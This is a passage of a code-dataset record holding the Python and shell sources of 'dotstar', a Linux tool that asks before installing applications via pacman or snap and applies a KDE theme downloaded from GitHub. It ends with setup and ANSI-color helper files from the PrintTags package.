self.pms.keys():\n supported_pm += possible_pm.system_name + \" \"\n ui.print_description(\"Supported package managers: \" + str(supported_pm))\n\n def ask_for_installation(self) -> bool:\n \"\"\"\n Ask to the user if they want to install the applications\n :return: if the user wants to install the applications\n \"\"\"\n install_application_choice = ui.ask(\"Do you want to install \" + self.name + \"? (y/N): \")\n return install_application_choice in (\"y\", \"Y\")\n\n def ask_pm(self, usable_pms: dict[str, PackageManager]) -> Optional[PackageManager]:\n \"\"\"\n Ask to the user witch PM use for the installation\n :return: the PM to use, or None if cancel\n \"\"\"\n possibles_pm = list(set(self.pms.keys()) & set(usable_pms.values()))\n choice = 0\n\n while not 1 <= choice <= len(possibles_pm):\n ui.print_information(\"Possible package managers:\")\n for index in range(len(possibles_pm)):\n ui.print_description(\n str(index + 1) + \": \" + possibles_pm[index].system_name\n )\n choice = ui.ask(\n \"Enter the number of the package manager you want to use (-1 to cancel the installation): \"\n )\n if choice == \"-1\":\n ui.print_error(\"Installation canceled\")\n return None\n elif not (choice.isnumeric() and 1 <= int(choice) <= len(possibles_pm)):\n ui.print_error(\"Error: please enter a number between %d and %d\" % (1, len(possibles_pm)))\n choice = 0\n else:\n choice = int(choice)\n\n return possibles_pm[choice - 1]\n" }, { "alpha_fraction": 0.6444833874702454, "alphanum_fraction": 0.6444833874702454, "avg_line_length": 44.68000030517578, "blob_id": "8316a7f32d29b3c57ac29555075e4573549c6a21", "content_id": "27e2249cb3ac77006963c167394651d77b19ec39", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1142, "license_type": "permissive", "max_line_length": 119, "num_lines": 25, "path": "/src/applications/package_manager.py", "repo_name": "le-chartreux/dotstar", "src_encoding": "UTF-8", "text": "class PackageManager:\n \"\"\"\n An object that contains the name used by dotstar and the true name of the PM (the one used by the OS, that dotstar\n calls when installing).\n dotstar don't uses the same name as the OS because snap has two mods of installation (sandbox and classic)\n so we have to differentiate them.\n Contains too the command shape, a string with a %s placeholder\n \"\"\"\n def __init__(\n self,\n dotstar_name: str,\n system_name: str,\n command_shape: str,\n multiple_apps_query_support: bool\n ) -> None:\n \"\"\"\n :param dotstar_name: the name of the PM that dotstar uses\n :param system_name: the name of the PM that the OS uses\n :param command_shape: the shape of the command. Must have a %s placeholder\n :param multiple_apps_query_support: if the PM supports query with multiple names (like \"pacman -Sy atom gedit\")\n \"\"\"\n self.dotstar_name = dotstar_name\n self.system_name = system_name\n self.command_shape = command_shape\n self.multiple_apps_query_support = multiple_apps_query_support\n" }, { "alpha_fraction": 0.6499999761581421, "alphanum_fraction": 0.6499999761581421, "avg_line_length": 23.615385055541992, "blob_id": "e02493e96bfabfea8a058fff8b1ee652808fb169", "content_id": "b16b82cd6b61947dc1cb2e54fbbcca162658af7b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 320, "license_type": "permissive", "max_line_length": 63, "num_lines": 13, "path": "/src/res.py", "repo_name": "le-chartreux/dotstar", "src_encoding": "UTF-8", "text": "from os import path\n\n\nWORKING_DIR = path.dirname(__file__)\nRES_DIR = path.join(WORKING_DIR, \"..\", \"res\")\n\n\ndef get_absolute_res_path(res_path: str) -> str:\n \"\"\"\n :param res_path: path to a ressource from the res directory\n :return: absolute path to the ressource\n \"\"\"\n return path.join(RES_DIR, res_path)\n" }, { "alpha_fraction": 0.7055837512016296, "alphanum_fraction": 0.7055837512016296, "avg_line_length": 48.25, "blob_id": "3e659f0dd4c60297349a9f745535fe2f022d3248", "content_id": "a660002ac4e1ae59be573567a2a5c55a9e4e467b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 394, "license_type": "permissive", "max_line_length": 99, "num_lines": 8, "path": "/src/applications/constants.py", "repo_name": "le-chartreux/dotstar", "src_encoding": "UTF-8", "text": "from applications.package_manager import PackageManager\n\n# Package managers that the application can use.\nSUPPORTED_PMS = {\n \"pacman\": PackageManager(\"pacman\", \"pacman\", \"sudo pacman -Sy %s\", True),\n \"snap sandbox\": PackageManager(\"snap sandbox\", \"snap\", \"sudo snap install %s\", True),\n \"snap classic\": PackageManager(\"snap classic\", \"snap\", \"sudo snap install %s --classic\", False)\n}\n" }, { "alpha_fraction": 0.6010498404502869, "alphanum_fraction": 0.6010498404502869, "avg_line_length": 40.563636779785156, "blob_id": "0fb4c4b1db9d28f5482065df73f6466034829ca3", "content_id": "52a5f702e47a80d5f537cf3d071dbb537dfd2452", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2286, "license_type": "permissive", "max_line_length": 117, "num_lines": 55, "path": "/src/main.py", "repo_name": "le-chartreux/dotstar", "src_encoding": "UTF-8", "text": "import os # for getting the DE\n\nimport applications.utilities as app_utils\nimport theme.kde as kde\nimport res\nimport constants\nimport ui\n\n\ndef main() -> None:\n\n # Application part\n install_applications_choice = ui.ask(\"Do you want to install applications? (y/N): \")\n if install_applications_choice in (\"y\", \"Y\"):\n application_store = app_utils.read_application_store(res.get_absolute_res_path(\"applications.json\"))\n\n usable_pms = app_utils.get_usable_pms()\n installation_dict = app_utils.create_installation_dict(usable_pms)\n\n for category_name in application_store:\n see_category_choice = ui.ask(\n \"Do you want to see available applications from the <\" + category_name + \"> category? (y/N): \"\n )\n if see_category_choice in (\"y\", \"Y\"):\n for application in application_store[category_name]:\n ui.print_delimiter()\n application.print_informations()\n install_it = application.ask_for_installation()\n if install_it:\n pm = application.ask_pm(usable_pms)\n if pm is not None:\n installation_dict[pm].append(application.pms[pm])\n\n ui.print_delimiter()\n ui.print_information(\"Installation on the selected apps...\")\n app_utils.install_apps(installation_dict)\n ui.print_information(\"End of the installation part.\")\n\n # Apparence part\n ui.print_delimiter()\n user_de = os.environ[\"DESKTOP_SESSION\"]\n if user_de in constants.SUPPORTED_DE:\n if ui.ask(\n \"Your desktop environment is compatible with the customization. Do you want to customize it? (y/N): \"\n ) in (\"Y\", \"y\"):\n ui.print_information(\n \"My custom theme \\\"Sweet-Layan-mashup\\\", a mashup of my two favorites KDE themes \"\n + \"(Sweet by EliverLara and Layan by Vince Liuice, plus Papirus icon theme) will be install.\"\n + \"You can return to your previous theme by going to apparence/ in the KDE setting app.\"\n )\n kde.install_kde_theme(\"Sweet-Layan-mashup\", res.get_absolute_res_path(\"theme/KDE/Sweet-Layan-mashup\"))\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.6244245171546936, "alphanum_fraction": 0.6253937482833862, "avg_line_length": 41.11224365234375, "blob_id": "ab4ecf7f1f020dac4cd11311a32b0f9ed5ad9a44", "content_id": "4c741f0a87b6cfa45f05ce0a42e9ada4563e817e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4127, "license_type": "permissive", "max_line_length": 112, "num_lines": 98, "path": "/src/applications/utilities.py", "repo_name": "le-chartreux/dotstar", "src_encoding": "UTF-8", "text": "import os\nimport json\n\nimport ui\n\nimport applications.constants as app_constants\nfrom applications.application import Application\nfrom applications.package_manager import PackageManager\n\n\ndef read_application_store(filename: str) -> dict[str, list[Application]]:\n \"\"\"\n Extracts the applications from the asked file\n\n :param filename: name of the file where the applications are stored (json)\n :return: a dictionary of applications with the name of each category as a key (Text editors for example) and\n the list of applications in this category as a value\n \"\"\"\n with open(filename, \"r\") as applications_file:\n all_application_data = json.load(applications_file)\n\n # application_store is a dictionary of applications with\n # - the name of each category as a key (Text editors for example)\n # - the list of applications in this category as a value\n application_store: dict[str, list[Application]] = {}\n\n # filling the application store from the JSON\n for category_name in all_application_data:\n for this_application_data in all_application_data[category_name]:\n # if the category is missing we add it\n if category_name not in application_store.keys():\n application_store[category_name] = []\n\n available_pm_for_this_app: dict[PackageManager, str] = {}\n for pm_name in this_application_data[\"PMs\"]:\n available_pm_for_this_app[\n app_constants.SUPPORTED_PMS[pm_name]\n ] = this_application_data[\"PMs\"][pm_name]\n\n # adding a new Application in the list of the tag\n application_store[category_name].append(\n Application(\n this_application_data[\"name\"],\n this_application_data[\"description\"],\n this_application_data[\"comment\"],\n this_application_data[\"url\"],\n this_application_data[\"paid\"],\n available_pm_for_this_app\n )\n )\n return application_store\n\n\ndef get_usable_pms() -> dict[str, PackageManager]:\n \"\"\"\n Look for supported package managers that are usable on the user's computer\n\n :return: a dict of usable PackageManager, with their dotstar name as key\n \"\"\"\n usable_pms = dict()\n for supported_pm_name in app_constants.SUPPORTED_PMS.keys():\n command_to_check_existence = \\\n \"type \" + app_constants.SUPPORTED_PMS[supported_pm_name].system_name \\\n + \" > /dev/null 2>&1\"\n if os.system(command_to_check_existence) == 0:\n usable_pms[supported_pm_name] = app_constants.SUPPORTED_PMS[supported_pm_name]\n\n return usable_pms\n\n\ndef create_installation_dict(usable_pm: dict[str, PackageManager]) -> dict[PackageManager, list[str]]:\n \"\"\"\n :return: a dict with each usable PackageManager as key and an empty list as value\n \"\"\"\n installation_dict: dict[PackageManager, list[str]] = {}\n for pm in usable_pm.values():\n installation_dict[pm] = []\n\n return installation_dict\n\n\ndef install_apps(installation_dict: dict[PackageManager, list[str]]) -> None:\n \"\"\"\n Installs all the given apps with their respective package manager\n\n :param installation_dict: a dict with usable PackageManager as key and a list of application names as value\n \"\"\"\n for pm in installation_dict.keys():\n if pm.multiple_apps_query_support and len(installation_dict[pm]) > 0:\n all_apps_to_install = \" \".join(installation_dict[pm])\n command = pm.command_shape % all_apps_to_install\n ui.print_information(\"The following installation command will be executed: \" + command)\n ui.exec_system(command)\n else:\n for app_name in installation_dict[pm]:\n command = pm.command_shape % app_name\n ui.print_information(\"The following installation command will be executed: \" + command)\n ui.exec_system(command)\n" }, { "alpha_fraction": 0.7142857313156128, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 20, "blob_id": "3bcdd26c38a109a89f0d8f55facd2413980be849", "content_id": "c52015d2c7f8fc127fb6742c6288cc37ba57beb0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 42, "license_type": "permissive", "max_line_length": 25, "num_lines": 2, "path": "/src/constants.py", "repo_name": "le-chartreux/dotstar", "src_encoding": "UTF-8", "text": "# customisation\nSUPPORTED_DE = {\"plasma\"}\n" }, { "alpha_fraction": 0.6743948459625244, "alphanum_fraction": 0.6767814755439758, "avg_line_length": 43.43939208984375, "blob_id": "d0fa67c36da0a6a279934d44a3b4826681705fae", "content_id": "1c538e9c68bd54c7a643e89312583ee6dfd70462", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2933, "license_type": "permissive", "max_line_length": 115, "num_lines": 66, "path": "/src/theme/kde.py", "repo_name": "le-chartreux/dotstar", "src_encoding": "UTF-8", "text": "import subprocess # for executing some commands\nimport os\n\nimport ui\n\nCURRENT_DIR_PATH = os.path.dirname(os.path.realpath(__file__))\n\n\ndef install_kde_theme(theme_name: str, theme_folder_path: str) -> None:\n \"\"\"\n Check that every needed software is here, then start to install the KDE theme\n \"\"\"\n\n # Checking that every command is available\n commands_to_check = [\"kpackagetool5\", \"lookandfeeltool\", \"wget\", \"tar\"]\n for command in commands_to_check:\n check_command = \"type \" + command + \" > /dev/null 2>&1\"\n # The execution will return 0 if present, else an other number. So it's not bool(command)\n command_available = not bool(ui.exec_system(check_command))\n\n if not command_available:\n ui.print_error(\"Error: \" + command + \" is needed but not find. Theme install canceled.\")\n return\n\n # looking if the theme is already installed, and deleting it if yes\n check_install_result = subprocess.run(['lookandfeeltool', '-l'], stdout=subprocess.PIPE)\n already_installed = theme_name in check_install_result.stdout.decode(\"utf-8\")\n if already_installed:\n ui.print_information(theme_name + \" already installed. Deleting...\")\n delete_command = \"kpackagetool5 -r \" + theme_folder_path\n delete_failed = bool(ui.exec_system(delete_command))\n if delete_failed:\n ui.print_error(\"Error: impossible to delete the theme.\")\n return\n\n # INSTALLATION OF THE DEPENDENCIES\n ui.print_information(\"Installation of the dependencies...\")\n dependencies_installation_failed = bool(ui.exec_system(\"sh %s/install_theme_components.sh\" % CURRENT_DIR_PATH))\n if dependencies_installation_failed:\n ui.print_error(\"Error: impossible to install all the needed dependencies.\")\n return\n\n print()\n ui.print_information(\"Installation of %s (the global theme)...\" % theme_name)\n installation_command = \"kpackagetool5 -i \" + theme_folder_path\n installation_failed = bool(ui.exec_system(installation_command))\n\n if installation_failed:\n ui.print_error(\"Error: impossible to install the global theme.\")\n return\n\n ui.print_information(\"Global theme successfully installed.\")\n ui.print_information(\"Setting the theme... (some QDBusConnection errors can span but they aren't serious)\")\n\n setting_the_theme_command = \"lookandfeeltool --apply \" + theme_name\n setting_failed = bool(ui.exec_system(setting_the_theme_command))\n\n if setting_failed:\n ui.print_error(\"Error: impossible to set the global theme.\")\n else:\n ui.print_information(\"Global theme successfully set.\")\n ui.print_information(\n \"Note that with KDE a bug can occur when changing window style:\"\n + \"if you have a white strip on some window (like the setting app),\"\n + \"change the color decoration to a light-one that then re-change it to Sweet-Dark.\"\n )\n" }, { "alpha_fraction": 0.7441490292549133, "alphanum_fraction": 0.7473301291465759, "avg_line_length": 44.37113571166992, "blob_id": "3b4d49aac796029a862a36a6b8f6898cfc0be3d3", "content_id": "8929424ecce0d6639eb050f5f4c28d999e63f602", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 4401, "license_type": "permissive", "max_line_length": 249, "num_lines": 97, "path": "/src/theme/install_theme_components.sh", "repo_name": "le-chartreux/dotstar", "src_encoding": "UTF-8", "text": "#!/bin/sh\n# Script to install the theme components.\n\n# GLOBAL VARIABLES\nUSER_SHARE_PATH=\"$HOME/.local/share/\"\nreadonly USER_SHARE_PATH\n\n# CREATING /tmp/dotstar-theme-components/\ncd \"/tmp/\" || echo \"Error: impossible to access to /tmp/ (wtf). Exiting.\" || exit 1\nMAIN_FOLDER_NAME=\"dotstar-theme-components\"\nreadonly MAIN_FOLDER_NAME\n# if dotstar-theme-components already exists, we delete it\nif [ -d \"$MAIN_FOLDER_NAME\" ]; then\n rm -rf \"$MAIN_FOLDER_NAME\"\nfi\nmkdir \"$MAIN_FOLDER_NAME\"\ncd \"$MAIN_FOLDER_NAME\" || echo \"Error: impossible to access to /tmp/$MAIN_FOLDER_NAME after creating it (wtf). Exiting.\" || exit 1\n\n\n# SWEET COMPONENTS\necho \"Beginning the Sweet part...\"\n# getting Sweet from GitHub\necho \"Downloading the Sweet theme from GitHub...\"\nSWEET_ARCHIVE_NAME=\"Sweet-nova.tar.gz\"\nSWEET_FOLDER_NAME=\"Sweet-nova\"\nreadonly SWEET_ARCHIVE_NAME\nreadonly SWEET_FOLDER_NAME\nwget https://github.com/EliverLara/Sweet/archive/nova.tar.gz --output-document=\"$SWEET_ARCHIVE_NAME\" --no-verbose --show-progress || echo \"Error: impossible to get the Sweet theme archive from GitHub. Exiting.\" || exit 1\necho \"Downloading the Sweet theme from GitHub: done.\"\necho \"Installing the Sweet components...\"\n# decompressing Sweet\ntar -xf \"$SWEET_ARCHIVE_NAME\" || echo \"Error: impossible to extract the Sweet theme archive. Exiting.\" || exit 1\n# removing the archive\nrm $SWEET_ARCHIVE_NAME\ncd \"$SWEET_FOLDER_NAME/kde\" || echo \"Error: impossible to enter on $SWEET_FOLDER_NAME/kde/. Exiting.\" || exit 1\n# installing aurorae\ncp -r \"aurorae/Sweet-Dark/\" \"$USER_SHARE_PATH/aurorae/themes/\"\n# installing colorsheme\ncp \"colorschemes/Sweet.colors\" \"$USER_SHARE_PATH/color-schemes/\"\n# installing cursors\ncp -r \"cursors/Sweet-cursors\" \"$USER_SHARE_PATH/icons/\"\n# installing sddm\n# TODO find where put it\n# Sweet components installed\necho \"Installing the Sweet components: done.\"\necho \"Sweet part finished.\"\n\n\n# Layan components\necho \"Beginning the Layan part...\"\necho \"Downloading the Layan theme from GitHub...\"\ncd \"/tmp/$MAIN_FOLDER_NAME/\" || echo \"Error: impossible to return to /tmp/$MAIN_FOLDER_NAME/. Exiting.\" || exit 1\n# getting Layan from GitHub\nLAYAN_ARCHIVE_NAME=\"Layan-master.tar.gz\"\nLAYAN_FOLDER_NAME=\"Layan-kde-master\"\nreadonly LAYAN_ARCHIVE_NAME\nreadonly LAYAN_FOLDER_NAME\nwget https://github.com/vinceliuice/Layan-kde/archive/master.tar.gz --output-document=\"$LAYAN_ARCHIVE_NAME\" --no-verbose --show-progress || echo \"Error: impossible to get the Layan theme archive from GitHub. Exiting.\" || exit 1\necho \"Downloading the Layan theme from GitHub: done.\"\necho \"Installing the Layan components...\"\n# decompressing Layan\ntar -xf \"$LAYAN_ARCHIVE_NAME\" || echo \"Error: impossible to extract the Layan theme archive. Exiting.\" || exit 1\n# removing the archive\nrm $LAYAN_ARCHIVE_NAME\ncd \"$LAYAN_FOLDER_NAME\" || echo \"Error: impossible to enter on $LAYAN_FOLDER_NAME/. Exiting.\" || exit 1\n# plasma\ncp -r \"plasma/desktoptheme/Layan/\" \"$USER_SHARE_PATH/plasma/desktoptheme/\"\ncp -r \"plasma/desktoptheme/icons/\" \"$USER_SHARE_PATH/plasma/desktoptheme/Layan/\"\n# wallpaper\ncp -r \"wallpaper/Layan/\" \"$USER_SHARE_PATH/wallpapers/\"\n# Layan components installed\necho \"Installing the Layan components: done.\"\necho \"Layan part finished.\"\n\n# Papirus (icons)\necho \"Beginning the Papirus part...\"\necho \"Downloading the Papirus icon theme from GitHub...\"\ncd \"/tmp/$MAIN_FOLDER_NAME/\" || echo \"Error: impossible to return to /tmp/$MAIN_FOLDER_NAME/. Exiting.\" || exit 1\n# getting Papirus from GitHub\nPAPIRUS_ARCHIVE_NAME=\"Papirus-master.tar.gz\"\nPAPIRUS_FOLDER_NAME=\"papirus-icon-theme-master\"\nreadonly PAPIRUS_ARCHIVE_NAME\nreadonly PAPIRUS_FOLDER_NAME\nwget https://github.com/PapirusDevelopmentTeam/papirus-icon-theme/archive/master.tar.gz --output-document=\"$PAPIRUS_ARCHIVE_NAME\" --no-verbose --show-progress || echo \"Error: impossible to get the Layan theme archive from GitHub. Exiting.\" || exit 1\necho \"Downloading the Papirus icon theme: done\"\necho \"Installing the Papirus icon theme...\"\n# decompressing Papirus\ntar -xf \"$PAPIRUS_ARCHIVE_NAME\" || echo \"Error: impossible to extract the Layan theme archive. Exiting.\" || exit 1\n# removing the archive\nrm \"$PAPIRUS_ARCHIVE_NAME\"\ncd \"$PAPIRUS_FOLDER_NAME\" || echo \"Error: impossible to enter on $LAYAN_FOLDER_NAME/. Exiting.\" || exit 1\n# installing icons\ncp -r \"Papirus/\" \"$USER_SHARE_PATH/icons/\"\necho \"Installing the Papirus icon theme: done.\"\necho \"Papirus part finished.\"\n\nexit 0\n" }, { "alpha_fraction": 0.6734219789505005, "alphanum_fraction": 0.6753219366073608, "avg_line_length": 33.83088302612305, "blob_id": "e8e12ae814328dccdbbf98ca79717b7bc5cc792f", "content_id": "6252cf0048f306226bf226926073b895cf634a4e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4737, "license_type": "permissive", "max_line_length": 202, "num_lines": 136, "path": "/README.md", "repo_name": "le-chartreux/dotstar", "src_encoding": "UTF-8", "text": "# dotstar\ndotstar is a Python 3 program to automate the installation and configuration of everything I think useful and cool on a Linux distro.\n\n\n\n## DISCLAIMER:\ndotstar is currently under development, so **it is UNUSABLE**. Come back later! If you really appreciate my initiative, you can star it to find it easily later.\n\n\n\n## Table of contents\n- [Main features](#main-features)\n- [Controls](#controls)\n- [Applications](#applications)\n - [Proposed applications](#proposed-applications)\n - [Supported package managers](#supported-package-managers)\n- [Apparence](#apparence)\n - [Supported DEs](#supported-DEs)\n- [Help](#help)\n - [F.A.Q](#F.A.Q.)\n - [Support](#support)\n \n\n\n## Main features\n- Get a full setup Linux from a fresh installation in minutes!* From applications install, configuration & plugin setup to the look of your DE (Desktop Environment), your Linux will be freaking awesome.\n\n- **You** have the power: dotstar will always ask for your permission on each of its actions (from installing an app to changing a color scheme).\n\n- Useful no matter your experience:\n\n - You're a complete noob with Linux? dotstar will help you to get everything you will need for your first steps in this awesome world.\n\n - You're an advanced user, but you're annoyed to reinstall everything manually each time you change your distro? Fork dotstar to get a base for your own fast installation and configuration app!\n\n - You're just a classic user looking for awesome apps and a fast rocking of the look of your DE? You're in the right place too.\n\n- dotstar uses categories, so for exemple it will ask you if you want some text editors, then for each text editor if you want to install it. \n\n*The speed will of course will depend on your connection speed if you choose to install heavy apps.\n\n\n\n## Controls\nAfter starting the app, dotstar will successively ask you if you want it to effectuate the proposed action.\n\n- Accept an action with `y` (for *yes*), decline with `n` (for *no*).\n \n- You don't understand what the tool is asking? Answer `-h` (for *help*) to get some help (unavailable for now).\n\n- You miss clic your last answer? Don't panic: answer `-p` (for *previous*) to reverse the last action and then return to it (unavailable for now).\n\n\n\n## Applications\n### Proposed applications \n\n- **Development**\n - **Text editors**\n - [Atom](https://atom.io)\n - [Gedit](https://wiki.gnome.org/Apps/Gedit)\n - [Visual Studio Code](https://code.visualstudio.com/)\n - **JetBrains IDEs**\n - [Android Studio](https://developer.android.com/studio)\n - [CLion](https://www.jetbrains.com/clion/)\n - [DataGrip](https://www.jetbrains.com/datagrip/)\n - [GoLand](https://www.jetbrains.com/go/)\n - [IntelliJ IDEA](https://www.jetbrains.com/idea/) (Community & Ultimate)\n - [PhpStorm](https://www.jetbrains.com/phpstorm/)\n - [Pycharm](https://www.jetbrains.com/pycharm/) (Community & Pro)\n - [Rider](https://www.jetbrains.com/rider/)\n - [RubyMine](https://www.jetbrains.com/ruby/)\n - [WebStorm](https://www.jetbrains.com/webstorm/)\n \n- **File managers**\n - [Dolphin](https://apps.kde.org/dolphin/)\n - [Nautilus](https://wiki.gnome.org/Apps/Files)\n\n - **Graphisme tools**\n - [Gcolor3](https://www.hjdskes.nl/projects/gcolor3/)\n - [GIMP](https://www.gimp.org)\n - [Inkscape](https://inkscape.org/)\n\n- **Multimedia**\n - [Shotwell](https://wiki.gnome.org/Apps/Shotwell)\n - [VLC](https://www.videolan.org/vlc/)\n\n- **Productivity & office tools**\n - [FreeOffice](https://www.freeoffice.com/en/)\n - [LibreOffice](https://www.libreoffice.org/)\n - [Toggl Track](https://www.toggl.com/track/)\n - [SimpleNote](https://simplenote.com)\n\n- **Social**\n - [Discord](https://discord.com/)\n - [Thunderbird](https://www.thunderbird.net/)\n\n- **System tools**\n - [Filelight](https://apps.kde.org/filelight/)\n - [Gnome System Monitor](https://wiki.gnome.org/Apps/SystemMonitor/)\n - [Timeshift](https://github.com/teejee2008/timeshift)\n\n- **Terminal emulators**\n - [Gnome Terminal](https://wiki.gnome.org/Apps/Terminal)\n - [Konsole](https://konsole.kde.org/)\n\n- **Web browsers**\n - [Chromium](https://www.chromium.org/Home)\n - [Firefox](https://www.mozilla.org/en-US/firefox/new/)\n - [Tor Browser](https://www.torproject.org/)\n\n- **Other apps**\n - [KCalc](https://apps.kde.org/kcalc/)\n - [Simple Screen Recorder](https://www.maartenbaert.be/simplescreenrecorder/)\n - [zsh](https://www.zsh.org)\n\n\n### Supported package managers\n- [X] Pacman\n- [X] Snap\n- [ ] Flatpak\n- [ ] APT\n- [ ] YUM\n\n\n\n## Apparence\n### Supported DEs\n- [X] KDE Plasma 5\n- [ ] Gnome 3\n\n\n\n## Help\n### F.A.Q.\n### Support\n" }, { "alpha_fraction": 0.6647371053695679, "alphanum_fraction": 0.6647371053695679, "avg_line_length": 24.912500381469727, "blob_id": "0f1a4a01fb6ea57aef99473435367a27a7405dbd", "content_id": "15bc10eed65fe85b875e63ef1895808833a65a2d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2073, "license_type": "permissive", "max_line_length": 117, "num_lines": 80, "path": "/src/ui.py", "repo_name": "le-chartreux/dotstar", "src_encoding": "UTF-8", "text": "from colorama import Fore\nfrom typing import Any, Callable\n\nimport os # for exec_system\n\n# colors\nQUESTION_COLOR = Fore.GREEN\nDELIMITER_COLOR = Fore.BLUE\nDESCRIPTION_COLOR = Fore.MAGENTA\nERROR_COLOR = Fore.RED\nINFORMATION_COLOR = Fore.YELLOW\nSYSTEM_COLOR = Fore.CYAN\nRESET_COLOR = Fore.RESET\n\nDELIMITER = \"##################################################\"\n\n\ndef exec_colored(fore: int, func: Callable[[Any], Any], param: Any) -> Any:\n \"\"\"\n Executes the function with an colored output\n\n :param fore: color of the output\n :param func: function to execute\n :param param: parameter to give to func\n :return: the result of func\n \"\"\"\n print(fore, end=\"\")\n result = func(param)\n print(RESET_COLOR, end=\"\")\n return result\n\n\ndef ask(question: str) -> str:\n \"\"\"\n Asks the question to the user with a colored font\n\n :param question: text to show before the input\n :return: what the user enters\n \"\"\"\n return exec_colored(QUESTION_COLOR, input, question + RESET_COLOR)\n\n\ndef print_delimiter() -> None:\n \"\"\"\n Prints the delimiter with a colored font\n \"\"\"\n exec_colored(DELIMITER_COLOR, print, DELIMITER)\n\n\ndef print_description(description: str) -> None:\n \"\"\"\n Prints the description with a colored font\n \"\"\"\n exec_colored(DESCRIPTION_COLOR, print, description)\n\n\ndef print_error(error_message: str) -> None:\n \"\"\"\n Prints the error with a colored font\n \"\"\"\n exec_colored(ERROR_COLOR, print, error_message)\n\n\ndef print_information(information: str) -> None:\n \"\"\"\n Prints the information with a colored font\n \"\"\"\n exec_colored(INFORMATION_COLOR, print, information)\n\n\ndef exec_system(command: str) -> int:\n \"\"\"\n Executes the given system command\n\n :return: the return code\n \"\"\"\n # we have to print SYSTEM_COLOR because since in exec_colored the color is put at the beginning of the first line\n # but the all the actual line is deleted with os.system, SYSTEM_COLOR will be ignored else.\n print(SYSTEM_COLOR)\n return exec_colored(SYSTEM_COLOR, os.system, command)\n" } ]
11
Frangmuler/PrintTags
https://github.com/Frangmuler/PrintTags
b852fe1b88d9517c553f10f739810dd522200e4e
b16ca9b52e235767f688e887d73bbcc592110d8b
36d1b4bd33a9e4e9746625812aab959d677912f1
refs/heads/master
2020-07-30T23:28:22.876697
2019-09-19T00:26:32
2019-09-19T00:26:32
210,397,930
1
0
MIT
2019-09-23T16:06:04
2019-09-19T00:26:40
2019-09-19T00:26:39
null
[ { "alpha_fraction": 0.7166504263877869, "alphanum_fraction": 0.7224926948547363, "avg_line_length": 35.67856979370117, "blob_id": "881b7308c345d196244f88fc83f1ccb314a485a2", "content_id": "ec5f6b32ded2741008c24c0aad02b0c5240539e0", "detected_licenses": [ "MIT", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1027, "license_type": "permissive", "max_line_length": 81, "num_lines": 28, "path": "/setup.py", "repo_name": "Frangmuler/PrintTags", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom setuptools import setup, find_packages\nimport PrintTags\n\nname = 'PrintTags'\ndescription = 'A lightweight, tagged, and color-coded Python 3 print alternative'\nlong_description = (\n 'PrintTags is a lightweight package designed to act as an '\n 'alternative to the built-in Python 3 print function. It prints '\n 'color coded, tagged messages that can be useful in debugging, '\n 'or if you just prefer a cleaner appearance in your terminal.'\n)\nurl = 'https://github.com/MichaelDylan77/PrintTags'\nauthor = 'Michael Lockyer'\nauthor_email = '[email protected]'\nversion = PrintTags.__version__\nlicense = 'MIT License'\nclassifiers = (\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n)\npackages = find_packages()\n\nsetup(name=name, description=description, long_description=long_description,\n version=version, url=url, author=author, author_email=author_email,\n license=license, classifiers=classifiers, packages=packages)\n" }, { "alpha_fraction": 0.5517815351486206, "alphanum_fraction": 0.5601065754890442, "avg_line_length": 21.75, "blob_id": "e7254c3440450445190f387b21650a828a49e4da", "content_id": "8cc5a7786638081431d52ef18eeb37aa1f6e0549", "detected_licenses": [ "MIT", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3003, "license_type": "permissive", "max_line_length": 61, "num_lines": 132, "path": "/PrintTags/colors.py", "repo_name": "Frangmuler/PrintTags", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n# Verify that using ANSI color is supported\nfrom os import getenv\n_color_supported = getenv('ANSI_COLORS_DISABLED') is None\n\n# ANSI color codes\n_black_color = 30\n_red_color = 31\n_green_color = 32\n_yellow_color = 33\n_blue_color = 34\n_magenta_color = 35\n_cyan_color = 36\n_white_color = 37\n\n# ANSI string format\n_base_string = '\\033[0;{}m{}\\033[0m'\n\n\ndef _colorize_string(string, color=_black_color) -> str:\n if _color_supported:\n string = _base_string.format(color, string)\n return string\n\n\nclass Colors(object):\n\n \"\"\"\n Contains all the base methods responsible for wrapping\n input strings in ANSI escape codes\n \"\"\"\n\n @staticmethod\n def black(string) -> str:\n \"\"\"\n Colorizes a string to black\n\n Args:\n string (str): The string to colorize\n Returns:\n str: The colorized string\n \"\"\"\n return _colorize_string(string, color=_black_color)\n\n @staticmethod\n def red(string) -> str:\n \"\"\"\n Colorizes a string to red\n\n Args:\n string (str): The string to colorize\n Returns:\n str: The colorized string\n \"\"\"\n return _colorize_string(string, color=_red_color)\n\n @staticmethod\n def green(string) -> str:\n \"\"\"\n Colorizes a string to green\n\n Args:\n string (str): The string to colorize\n Returns:\n str: The colorized string\n \"\"\"\n return _colorize_string(string, color=_green_color)\n\n @staticmethod\n def yellow(string) -> str:\n \"\"\"\n Colorizes a string to yellow\n\n Args:\n string (str): The string to colorize\n Returns:\n str: The colorized string\n \"\"\"\n return _colorize_string(string, color=_yellow_color)\n\n @staticmethod\n def blue(string) -> str:\n \"\"\"\n Colorizes a string to blue\n\n Args:\n 